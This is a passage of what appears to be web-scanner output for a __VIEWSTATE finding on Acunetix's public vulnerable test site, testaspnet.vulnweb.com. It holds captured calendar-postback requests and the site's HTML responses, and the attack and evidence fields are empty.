border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:Black" title="April 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:Black" title="April 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:Black" title="April 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:Black" title="April 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:Black" title="April 12">12</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:White" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:Black" title="April 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:Black" title="April 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1147 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,147 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8126&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgDAoJByE9oIZGRk3S%2B8XajATKfc9sHGK1Gh780GR2Q%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKAweRZAqDc%2BbwPArrjr%2BwOAo333M8MAo333M8MAo338OIFAo338OIFAo335LkNAo335LkNAo33mNwGAo33mNwGAo33jPMPAo33jPMPAo33oJYHAo33oJYHAo331CoCjffUKgKN94iSDQKN94iSDQKN97ypBgKN97ypBgLmnY%2FeCQLmnY%2FeCQLmnaP1AgLmnaP1AgLmndeJCgLmndeJCgLmncusAwLmncusAwLmnf%2FDDALmnf%2FDDALmnZPmBQLmnZPmBQLmnYe9DQLmnYe9DQLmnbvQBgLmnbvQBgLmne%2B5AwLmne%2B5AwLmnYPcDALmnYPcDAL7pO3FDwL7pO3FDwL7pIGYBwL7pIGYBwL7pLU%2FAvuktT8C%2B6Sp0gkC%2B6Sp0gkC%2B6Td9gIC%2B6Td9gIC%2B6TxjQoC%2B6TxjQoC%2B6TloAMC%2B6TloAMC%2B6SZxwwC%2B6SZxwwC%2B6TNrAkC%2B6TNrAkC%2B6ThwwIC%2B6ThwwIC3Mvz6AUC3Mvz6AUC3Mvnjw0C3Mvnjw0C3MubogYC3MubogYC3MuP%2BQ8C3MuP%2BQ8C3MujnAcC3MujnAcC3MvXMALcy9cwAtzLy9cJAtzLy9cJAtzL%2F%2BoCAtzL%2F%2BoCAtzL09MPAtzL09MPAtzLx%2FYIAtzLx%2FYIArHS0Z8KArHS0Z8KArHSxbIDArHSxbIDArHS%2BckMArHS%2BckMHrGR%2Fl%2BNozFIwFevO8RrulTQFCo%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:53:42 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgDAoJByE9oIZGRk3S+8XajATKfc9sHGK1Gh780GR2Q=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKAweRZAqDc+bwPArrjr+wOAo333M8MAo333M8MAo338OIFAo338OIFAo335LkNAo335LkNAo33mNwGAo33mNwGAo33jPMPAo33jPMPAo33oJYHAo33oJYHAo331CoCjffUKgKN94iSDQKN94iSDQKN97ypBgKN97ypBgLmnY/eCQLmnY/eCQLmnaP1AgLmnaP1AgLmndeJCgLmndeJCgLmncusAwLmncusAwLmnf/DDALmnf/DDALmnZPmBQLmnZPmBQLmnYe9DQLmnYe9DQLmnbvQBgLmnbvQBgLmne+5AwLmne+5AwLmnYPcDALmnYPcDAL7pO3FDwL7pO3FDwL7pIGYBwL7pIGYBwL7pLU/AvuktT8C+6Sp0gkC+6Sp0gkC+6Td9gIC+6Td9gIC+6TxjQoC+6TxjQoC+6TloAMC+6TloAMC+6SZxwwC+6SZxwwC+6TNrAkC+6TNrAkC+6ThwwIC+6ThwwIC3Mvz6AUC3Mvz6AUC3Mvnjw0C3Mvnjw0C3MubogYC3MubogYC3MuP+Q8C3MuP+Q8C3MujnAcC3MujnAcC3MvXMALcy9cwAtzLy9cJAtzLy9cJAtzL/+oCAtzL/+oCAtzL09MPAtzL09MPAtzLx/YIAtzLx/YIArHS0Z8KArHS0Z8KArHSxbIDArHSxbIDArHS+ckMArHS+ckMHrGR/l+NozFIwFevO8RrulTQFCo=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:Black" title="March 31">31</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:White" title="April 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:Black" title="April 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:Black" title="April 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:Black" title="April 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:Black" title="April 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:Black" title="April 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1127 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,127 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8142&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgDAPDcFINoIZGRkEpnMXM%2BkMJDU%2FpF7%2BH%2Fz8hOsBtE%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKK%2FIrmDwKg3Pm8DwK646%2FsDgKN99zPDAKN99zPDAKN9%2FDiBQKN9%2FDiBQKN9%2BS5DQKN9%2BS5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3%2FwwwC5p3%2FwwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC%2B6TtxQ8C%2B6TtxQ8C%2B6SBmAcC%2B6SBmAcC%2B6S1PwL7pLU%2FAvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8%2BgFAtzL8%2BgFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj%2FkPAtzLj%2FkPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy%2F%2FqAgLcy%2F%2FqAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDBcyf4KZNlvXAN6MkLaDguN%2Fjweg
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:39:00 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgDAPDcFINoIZGRkEpnMXM+kMJDU/pF7+H/z8hOsBtE=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKK/IrmDwKg3Pm8DwK646/sDgKN99zPDAKN99zPDAKN9/DiBQKN9/DiBQKN9+S5DQKN9+S5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3/wwwC5p3/wwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC+6TtxQ8C+6TtxQ8C+6SBmAcC+6SBmAcC+6S1PwL7pLU/AvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8+gFAtzL8+gFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj/kPAtzLj/kPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy//qAgLcy//qAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDBcyf4KZNlvXAN6MkLaDguN/jweg" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD 